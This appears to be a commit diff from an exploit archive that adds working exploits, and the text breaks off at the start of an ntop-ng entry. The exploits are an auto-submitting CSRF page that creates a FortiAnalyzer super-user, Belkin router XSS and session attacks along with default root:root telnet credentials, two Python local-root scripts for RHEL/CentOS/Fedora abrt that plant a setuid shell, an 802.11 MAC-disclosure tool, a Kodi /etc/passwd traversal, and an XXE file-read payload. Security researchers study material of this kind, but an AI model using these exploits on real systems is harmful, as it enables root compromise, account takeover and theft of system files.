DB: 2015-12-02
14 new exploits
This commit is contained in:
parent
e1b6ec4b24
commit
b6f9265856
15 changed files with 36410 additions and 0 deletions
146
platforms/hardware/remote/38824.html
Executable file
146
platforms/hardware/remote/38824.html
Executable file
|
@ -0,0 +1,146 @@
|
|||
source: http://www.securityfocus.com/bid/63663/info
|
||||
|
||||
FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible.
|
||||
|
||||
Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable.
|
||||
|
||||
<html>
|
||||
|
||||
|
||||
|
||||
<body onload="CSRF.submit();">
|
||||
|
||||
|
||||
|
||||
<html>
|
||||
|
||||
|
||||
|
||||
<body onload="CSRF.submit();">
|
||||
|
||||
|
||||
|
||||
<form id="csrf"
|
||||
action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog";
|
||||
method="post" name="CSRF">
|
||||
|
||||
<input name="userId" value="user.via.cfsr"> </input>
|
||||
|
||||
<input name="type" value="0"> </input>
|
||||
|
||||
<input name="rserver" value=""> </input>
|
||||
|
||||
<input name="lserver" value=""> </input>
|
||||
|
||||
<input name="subject" value=""> </input>
|
||||
|
||||
<input name="cacerts" value="Fortinet_CA2"> </input>
|
||||
|
||||
<input name="password" value="123456"> </input>
|
||||
|
||||
<input name="password_updated" value="1"> </input>
|
||||
|
||||
<input name="confirm_pwd" value="123456"> </input>
|
||||
|
||||
<input name="confirm_pwd_updated" value="1"> </input>
|
||||
|
||||
<input name="host_1" value="0.0.0.0/0.0.0.0"> </input>
|
||||
|
||||
<input name="host_2" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host_3" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host_4" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host_5" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host_6" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host_7" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host_8" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host_9" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host_10" value="255.255.255.255/255.255.255.255"> </input>
|
||||
|
||||
<input name="host6_1"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_2"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_3"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_4"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_5"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_6"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_7"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_8"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_9"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="host6_10"
|
||||
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
||||
|
||||
<input name="profile" value="Super_User"> </input>
|
||||
|
||||
<input name="alladomRDGrp" value="0"> </input>
|
||||
|
||||
<input name="_adom" value=""> </input>
|
||||
|
||||
<input name="allpackRDGrp" value="0"> </input>
|
||||
|
||||
<input name="_adom" value=""> </input>
|
||||
|
||||
<input name="allpackRDGrp" value="0"> </input>
|
||||
|
||||
<input name="_pack" value=""> </input>
|
||||
|
||||
<input name="desc" value=""> </input>
|
||||
|
||||
<input name="showForce" value="0"> </input>
|
||||
|
||||
<input name="numhosts" value="0"> </input>
|
||||
|
||||
<input name="numhosts6" value="3"> </input>
|
||||
|
||||
<input name="_comp_8" value="OK"> </input>
|
||||
|
||||
<input name="actionevent" value="new"> </input>
|
||||
|
||||
<input name="profileId" value=""> </input>
|
||||
|
||||
<input name="mgt" value=""> </input>
|
||||
|
||||
<input name="dashboard" value=""> </input>
|
||||
|
||||
<input name="dashboardmodal" value=""> </input>
|
||||
|
||||
<input name="csrf_token" value=""> </input>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
</form>
|
||||
|
||||
</body>
|
||||
|
||||
|
||||
|
||||
</html>
|
||||
|
120
platforms/hardware/webapps/38840.txt
Executable file
120
platforms/hardware/webapps/38840.txt
Executable file
|
@ -0,0 +1,120 @@
|
|||
##Full Disclosure:
|
||||
|
||||
#Exploit Title : Belkin N150 Wireless Home Router Multiple
|
||||
Vulnerabilities
|
||||
#Exploit Author : Rahul Pratap Singh
|
||||
#Date : 30/Nov/2015
|
||||
#Home Page Link : http://www.belkin.com
|
||||
#Blog Url : 0x62626262.wordpress.com
|
||||
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
|
||||
#Status : Not Patched
|
||||
|
||||
→ Vulnerability/BUG Report :
|
||||
|
||||
1)
|
||||
|
||||
• Vulnerability Title : HTML/Script Injection
|
||||
• Version : F9K1009 v1
|
||||
• Firmware : 1.00.09
|
||||
|
||||
→ Proof of Concept:
|
||||
|
||||
"InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is
|
||||
vulnerable.
|
||||
|
||||
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
|
||||
|
||||
→ Steps to Reproduce:
|
||||
|
||||
Send the following post request using Burpsuite,etc
|
||||
|
||||
POST /cgi-bin/webproc HTTP/1.1
|
||||
Host: 192.168.2.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
|
||||
Firefox/35.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer:
|
||||
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
|
||||
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 260
|
||||
|
||||
%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D
|
||||
|
||||
2)
|
||||
|
||||
• Vulnerability Title : Session Hijacking
|
||||
• Version : F9K1009 v1
|
||||
• Firmware : 1.00.09
|
||||
|
||||
→ Proof of Concept:
|
||||
|
||||
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
|
||||
|
||||
sessionid is allocated using hex encoding and of fixed length i.e 8 .
|
||||
Therefore, it is very easy to bruteforce it in feasible amount for time as
|
||||
this session id ranges from 00000000 to ffffffff
|
||||
|
||||
→ Steps to Reproduce:
|
||||
|
||||
Send the following request using Burpsuite and Bruteforce the sessionid.
|
||||
|
||||
POST /cgi-bin/webproc HTTP/1.1
|
||||
Host: 192.168.2.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
|
||||
Firefox/35.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer:
|
||||
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
|
||||
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
|
||||
|
||||
3)
|
||||
|
||||
• Vulnerability Title : Telnet Enabled with Default Pass
|
||||
• Version : F9K1009 v1
|
||||
• Firmware : 1.00.09
|
||||
|
||||
→ Vulnerability Details:
|
||||
|
||||
Telnet protocol can be used by an attacker to gain remote access to the
|
||||
router with root privileges.
|
||||
|
||||
→ Proof of Concept:
|
||||
|
||||
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
|
||||
|
||||
→ Steps to Reproduce:
|
||||
|
||||
1) Open terminal
|
||||
2) Type following command:
|
||||
telnet 192.168.2.1
|
||||
3) Default user and pass is root:root
|
||||
|
||||
4)
|
||||
|
||||
• Vulnerability Title : Cross Site Request Forgery
|
||||
• Version : F9K1009 v1
|
||||
• Firmware : 1.00.09
|
||||
|
||||
→ Proof of Concept:
|
||||
|
||||
Request doesn't contain any CSRF-token. Therefore, requests can be forged.
|
||||
It can be verified with any request.
|
||||
|
||||
Status:
|
||||
Vendor Notified: 20 Oct 2015
|
||||
Vendor Notified Again: 25 Nov 2015
|
||||
|
||||
No Response.
|
||||
|
||||
Full Disclosure: 30 Nov 2015
|
||||
|
||||
Ref:
|
||||
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
|
114
platforms/linux/local/38832.py
Executable file
114
platforms/linux/local/38832.py
Executable file
|
@ -0,0 +1,114 @@
|
|||
#!/usr/bin/python
|
||||
# CVE-2015-5287 (?)
|
||||
# abrt/sosreport RHEL 7.0/7.1 local root
|
||||
# rebel 09/2015
|
||||
|
||||
# [user@localhost ~]$ python sosreport-rhel7.py
|
||||
# crashing pid 19143
|
||||
# waiting for dump directory
|
||||
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
|
||||
# waiting for sosreport directory
|
||||
# sosreport: sosreport-localhost.localdomain-20151130194114
|
||||
# waiting for tmpfiles
|
||||
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
|
||||
# moving directory
|
||||
# moving tmpfiles
|
||||
# tmpurfpyY -> tmpurfpyY.old
|
||||
# tmpYnCfnQ -> tmpYnCfnQ.old
|
||||
# waiting for sosreport to finish (can take several minutes)........................................done
|
||||
# success
|
||||
# bash-4.2# id
|
||||
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
|
||||
# bash-4.2# cat /etc/redhat-release
|
||||
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
|
||||
|
||||
import os,sys,glob,time,sys,socket
|
||||
|
||||
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
|
||||
|
||||
pid = os.fork()
|
||||
|
||||
if pid == 0:
|
||||
os.execl("/usr/bin/sleep","sleep","100")
|
||||
|
||||
time.sleep(0.5)
|
||||
|
||||
print "crashing pid %d" % pid
|
||||
|
||||
os.kill(pid,11)
|
||||
|
||||
print "waiting for dump directory"
|
||||
|
||||
def waitpath(p):
|
||||
while 1:
|
||||
r = glob.glob(p)
|
||||
if len(r) > 0:
|
||||
return r
|
||||
time.sleep(0.05)
|
||||
|
||||
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
|
||||
|
||||
print "dump directory: ", dumpdir
|
||||
|
||||
os.chdir(dumpdir)
|
||||
|
||||
print "waiting for sosreport directory"
|
||||
|
||||
sosreport = waitpath("sosreport-*")[0]
|
||||
|
||||
print "sosreport: ", sosreport
|
||||
|
||||
print "waiting for tmpfiles"
|
||||
tmpfiles = waitpath("tmp*")
|
||||
|
||||
print "tmpfiles: ", tmpfiles
|
||||
|
||||
print "moving directory"
|
||||
|
||||
os.rename(sosreport, sosreport + ".old")
|
||||
os.mkdir(sosreport)
|
||||
os.chmod(sosreport,0777)
|
||||
|
||||
os.mkdir(sosreport + "/sos_logs")
|
||||
os.chmod(sosreport + "/sos_logs",0777)
|
||||
|
||||
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
|
||||
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
|
||||
|
||||
print "moving tmpfiles"
|
||||
|
||||
for x in tmpfiles:
|
||||
print "%s -> %s" % (x,x + ".old")
|
||||
os.rename(x, x + ".old")
|
||||
open(x, "w+").write("/tmp/hax.sh\n")
|
||||
os.chmod(x,0666)
|
||||
|
||||
|
||||
os.chdir("/")
|
||||
|
||||
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
|
||||
|
||||
|
||||
def trigger():
|
||||
open("/tmp/hax.sh","w+").write(payload)
|
||||
os.chmod("/tmp/hax.sh",0755)
|
||||
try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
|
||||
except: pass
|
||||
time.sleep(0.5)
|
||||
try:
|
||||
os.stat("/tmp/sh")
|
||||
except:
|
||||
print "could not create suid"
|
||||
sys.exit(-1)
|
||||
print "success"
|
||||
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
|
||||
sys.exit(-1)
|
||||
|
||||
for x in xrange(0,60*10):
|
||||
if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
|
||||
print "done"
|
||||
trigger()
|
||||
time.sleep(1)
|
||||
sys.stderr.write(".")
|
||||
|
||||
print "timed out"
|
117
platforms/linux/remote/38826.py
Executable file
117
platforms/linux/remote/38826.py
Executable file
|
@ -0,0 +1,117 @@
|
|||
source: http://www.securityfocus.com/bid/63743/info
|
||||
|
||||
Linux Kernel is prone to an information-disclosure vulnerability.
|
||||
|
||||
An attacker can exploit this issue to obtain sensitive information like original MAC address; information obtained may aid in other attacks.
|
||||
|
||||
Note: This BID was previously titled 'Atheros Wireless Drivers MAC Address Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.
|
||||
|
||||
#!/usr/bin/python
|
||||
import logging
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||
from scapy.all import *
|
||||
import random
|
||||
|
||||
# number of times to inject probe for one bit (combat packet loss)
|
||||
ATTEMPTS_PER_BIT = 6
|
||||
# time to wait for ACK in seconds
|
||||
SNIFFTIME = 0.3
|
||||
|
||||
|
||||
def randmac():
|
||||
mac = [0] * 6
|
||||
for i in xrange(6):
|
||||
mac[i] = random.randint(0, 256)
|
||||
|
||||
# avoid multicast/broadcast mac
|
||||
mac[0] = mac[0] & 0xFE
|
||||
|
||||
return ":".join([format(byte, '02x') for byte in mac])
|
||||
|
||||
|
||||
def parsemac(macstr):
|
||||
parts = macstr.replace("-", ":").split(":")
|
||||
if len(parts) != 6:
|
||||
raise ValueError("MAC does not consist of 6 parts (separated by : or -)")
|
||||
|
||||
return [int(byte, 16) for byte in parts]
|
||||
|
||||
|
||||
def is_ack(p):
|
||||
return Dot11 in p and p.type == 1 and p.subtype == 13
|
||||
|
||||
|
||||
def find_fixed_bits(s, mac):
|
||||
# eventually contains the real MAC address
|
||||
orgmac = [0] * 6
|
||||
|
||||
# random MAC address, used as sender, to which the target will send an ACK
|
||||
srcmac = randmac()
|
||||
|
||||
# for all the bits - FIXME: Don't consider H.O. bit of first MAC byte
|
||||
for i in range(6):
|
||||
for bit in range(8):
|
||||
# flip the bit at current position
|
||||
currbit = mac[i] & (1 << bit)
|
||||
mac[i] ^= (1 << bit)
|
||||
|
||||
# convert modified mac to string
|
||||
strmac = ":".join([format(byte, '02x') for byte in mac])
|
||||
print "Probing", strmac, "...",
|
||||
|
||||
replied = False
|
||||
for attempt in range(ATTEMPTS_PER_BIT):
|
||||
# inject data packet to modified MAC address
|
||||
packet = Dot11(type="Data", subtype=4, FCfield="from-DS",
|
||||
addr1=strmac, addr2=srcmac, addr3=strmac)
|
||||
s.send(RadioTap()/packet)
|
||||
|
||||
# Sniff air for ACK to modified MAC
|
||||
l = sniff(lfilter=lambda p: is_ack(p) and p.addr1 == srcmac, count=1,
|
||||
timeout=SNIFFTIME, opened_socket=s)
|
||||
|
||||
# We we got an ACK, don't need to try again
|
||||
if len(l) == 1:
|
||||
replied = True
|
||||
break
|
||||
|
||||
print replied
|
||||
|
||||
# If client replied, original bit is different from the one currently set,
|
||||
# otherwise it's equal to original bit.
|
||||
if replied:
|
||||
orgmac[i] |= (~currbit) & (1 << bit)
|
||||
else:
|
||||
orgmac[i] |= currbit
|
||||
|
||||
# flip bit back to original value
|
||||
mac[i] ^= (1 << bit)
|
||||
|
||||
# Done, return original MAC
|
||||
return orgmac
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) != 3:
|
||||
print "Usage:", sys.argv[0], "interface macaddr"
|
||||
quit(1)
|
||||
|
||||
try:
|
||||
mac = parsemac(sys.argv[2])
|
||||
conf.iface = sys.argv[1]
|
||||
|
||||
random.seed()
|
||||
|
||||
# Open up read/write socket so we don't miss the ACK
|
||||
L2socket = conf.L2socket
|
||||
s = L2socket(type=ETH_P_ALL, iface=conf.iface)
|
||||
|
||||
# Now find the MAC
|
||||
orgmac = find_fixed_bits(s, mac)
|
||||
s.close()
|
||||
|
||||
print "\nReal MAC address:", ":".join(format(byte, "02x") for byte in orgmac), "\n"
|
||||
except ValueError, e:
|
||||
print "Invalid MAC address:", e
|
||||
except socket.error, e:
|
||||
print "Error with provided interface:", e
|
21
platforms/linux/webapps/38833.txt
Executable file
21
platforms/linux/webapps/38833.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: arbitrary file access kodi web interface
|
||||
# Shodan dork: title:kodi
|
||||
# Date: 25-11-2015
|
||||
# Contact: https://twitter.com/mpronk89
|
||||
# Software Link: http://kodi.tv/
|
||||
# Original report:
|
||||
http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
|
||||
# Version: v15
|
||||
# Tested on: linux
|
||||
# CVE : n/a
|
||||
|
||||
kodi web interface vulnerable to arbitrary file read.
|
||||
|
||||
example:
|
||||
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
|
||||
|
||||
|
||||
for passwd
|
||||
|
||||
(issue fixed in 2012, reintroduced in february 2015. Fixed again november
|
||||
2015 for v16)
|
219
platforms/multiple/local/38835.py
Executable file
219
platforms/multiple/local/38835.py
Executable file
|
@ -0,0 +1,219 @@
|
|||
#!/usr/bin/python
|
||||
# CVE-2015-5273 + CVE-2015-5287
|
||||
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
|
||||
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
|
||||
# rebel 09/2015
|
||||
# ----------------------------------------
|
||||
|
||||
# [user@localhost ~]$ id
|
||||
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
|
||||
# [user@localhost ~]$ cat /etc/redhat-release
|
||||
# CentOS Linux release 7.1.1503 (Core)
|
||||
# [user@localhost ~]$ python abrt-centos-fedora.py
|
||||
# -- lots of boring output, might take a while on a slow connection --
|
||||
# /var/spool/abrt/abrt-hax-coredump created
|
||||
# executing crashing process..
|
||||
# success
|
||||
# bash-4.2# id
|
||||
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
|
||||
|
||||
|
||||
import time,os,datetime,sys,resource,socket
|
||||
|
||||
|
||||
fedora = "Fedora" in open("/etc/redhat-release").read()
|
||||
|
||||
# mkdir dir1
|
||||
# ln -s /var/spool/abrt dir1/hax
|
||||
# mkdir dir2
|
||||
# mkdir dir2/hax
|
||||
# ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump
|
||||
# cd dir1
|
||||
# find . -depth -print | cpio -o > ../cpio1
|
||||
# cd ../dir2
|
||||
# find . -depth -print | cpio -o > ../cpio2
|
||||
|
||||
cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip")
|
||||
cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip")
|
||||
|
||||
if fedora:
|
||||
cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt")
|
||||
|
||||
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
|
||||
|
||||
|
||||
# we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries
|
||||
# and we can't control the contents of that region. on 32 bit binaries [stack] is at the end
|
||||
|
||||
# the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written
|
||||
# to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp
|
||||
|
||||
elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip")
|
||||
|
||||
# most people don't have nasm installed so i preassembled it
|
||||
# if you're not brave enough to run the preassembled file, here's the code :)
|
||||
|
||||
"""
|
||||
; abrt-hax.asm
|
||||
; nasm -f bin -o abrt-hax abrt-hax.asm
|
||||
BITS 32
|
||||
org 0x08048000
|
||||
ehdr: ; Elf32_Ehdr
|
||||
db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident
|
||||
times 8 db 0
|
||||
dw 2 ; e_type
|
||||
dw 3 ; e_machine
|
||||
dd 1 ; e_version
|
||||
dd _start ; e_entry
|
||||
dd phdr - $$ ; e_phoff
|
||||
dd 0 ; e_shoff
|
||||
dd 0 ; e_flags
|
||||
dw ehdrsize ; e_ehsize
|
||||
dw phdrsize ; e_phentsize
|
||||
dw 1 ; e_phnum
|
||||
dw 0 ; e_shentsize
|
||||
dw 0 ; e_shnum
|
||||
dw 0 ; e_shstrndx
|
||||
ehdrsize equ $ - ehdr
|
||||
phdr: ; Elf32_Phdr
|
||||
dd 1 ; p_type
|
||||
dd 0 ; p_offset
|
||||
dd $$ ; p_vaddr
|
||||
dd $$ ; p_paddr
|
||||
dd filesize ; p_filesz
|
||||
dd filesize ; p_memsz
|
||||
dd 5 ; p_flags
|
||||
dd 0x1000 ; p_align
|
||||
phdrsize equ $ - phdr
|
||||
|
||||
_start:
|
||||
inc esp
|
||||
cmp dword [esp],0x706d742f
|
||||
jne l
|
||||
or esp,0xfff
|
||||
inc esp
|
||||
mov edx,500
|
||||
l3:
|
||||
mov ecx,msglen
|
||||
mov ebx,message
|
||||
sub esp,ecx
|
||||
l2:
|
||||
mov al,[ebx]
|
||||
mov [esp],al
|
||||
inc esp
|
||||
inc ebx
|
||||
loop l2
|
||||
sub esp,msglen
|
||||
dec edx
|
||||
cmp edx,0
|
||||
jne l3
|
||||
mov eax,0x41414141
|
||||
jmp eax
|
||||
message db '////////tmp/hax.sh',0x0a,0
|
||||
msglen equ $-message
|
||||
"""
|
||||
|
||||
|
||||
|
||||
build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1]
|
||||
|
||||
os.chdir("/tmp")
|
||||
|
||||
|
||||
open("build_ids","w+").write(build_id + "\n")
|
||||
|
||||
print build_id
|
||||
|
||||
|
||||
def child():
|
||||
timestamp = int(time.time())
|
||||
|
||||
for i in xrange(0,3):
|
||||
try:
|
||||
t = datetime.datetime.fromtimestamp(timestamp+i)
|
||||
d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid())
|
||||
os.mkdir(d)
|
||||
os.chmod(d,0777)
|
||||
os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio")
|
||||
print "created %s" % d
|
||||
except: pass
|
||||
|
||||
os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y")
|
||||
|
||||
try:
|
||||
os.mkfifo("/var/tmp/haxfifo")
|
||||
os.chmod("/var/tmp/haxfifo",0666)
|
||||
except:
|
||||
pass
|
||||
|
||||
def fifo(a):
|
||||
print "reading from fifo.."
|
||||
open("/var/tmp/haxfifo").read()
|
||||
print "done"
|
||||
|
||||
print "writing to fifo.."
|
||||
open("/var/tmp/haxfifo","w+").write(a)
|
||||
print "done"
|
||||
|
||||
if os.fork() == 0: child()
|
||||
|
||||
print "first cpio..."
|
||||
fifo(cpio1)
|
||||
|
||||
os.wait()
|
||||
time.sleep(1)
|
||||
|
||||
if os.fork() == 0: child()
|
||||
print "second cpio..."
|
||||
fifo(cpio2)
|
||||
|
||||
os.wait()
|
||||
time.sleep(1)
|
||||
|
||||
if fedora:
|
||||
sym = "/var/tmp/abrt/abrt-hax-coredump"
|
||||
else:
|
||||
sym = "/var/spool/abrt/abrt-hax-coredump"
|
||||
|
||||
try:
|
||||
os.lstat(sym)
|
||||
except:
|
||||
print "could not create symlink"
|
||||
sys.exit(-1)
|
||||
|
||||
print "%s created" % sym
|
||||
|
||||
open("/tmp/abrt-hax","w+").write(elf)
|
||||
os.chmod("/tmp/abrt-hax",0755)
|
||||
|
||||
if os.fork() == 0:
|
||||
resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,))
|
||||
print "executing crashing process.."
|
||||
os.execle("/tmp/abrt-hax","",{})
|
||||
|
||||
os.wait()
|
||||
time.sleep(1)
|
||||
|
||||
if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read():
|
||||
print "could not modify /proc/sys/kernel/modprobe"
|
||||
sys.exit(-1)
|
||||
|
||||
open("/tmp/hax.sh","w+").write(payload)
|
||||
os.chmod("/tmp/hax.sh",0755)
|
||||
|
||||
try:
|
||||
socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
|
||||
except:
|
||||
pass
|
||||
|
||||
time.sleep(0.5)
|
||||
|
||||
try:
|
||||
os.stat("/tmp/sh")
|
||||
except:
|
||||
print "could not create suid"
|
||||
sys.exit(-1)
|
||||
|
||||
print "success"
|
||||
|
||||
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
|
22
platforms/multiple/remote/38825.xml
Executable file
22
platforms/multiple/remote/38825.xml
Executable file
|
@ -0,0 +1,22 @@
|
|||
source: http://www.securityfocus.com/bid/63719/info
|
||||
|
||||
IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities.
|
||||
|
||||
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
|
||||
|
||||
IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable.
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT comments ANY >
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
|
||||
|
||||
<ob:Openbravo xmlns:ob="http://www.example.com"
|
||||
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
|
||||
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
|
||||
<id>C970393BDF6C43E2B030D23482D88EED</id>
|
||||
<comments>&xxe;</comments>
|
||||
</Product>
|
||||
</ob:Openbravo>
|
||||
|
||||
|
24
platforms/multiple/webapps/38836.txt
Executable file
24
platforms/multiple/webapps/38836.txt
Executable file
|
@ -0,0 +1,24 @@
|
|||
# Vulnerability title: ntop-ng <= 2.0.151021 - Privilege Escalation
|
||||
# Author: Dolev Farhi
|
||||
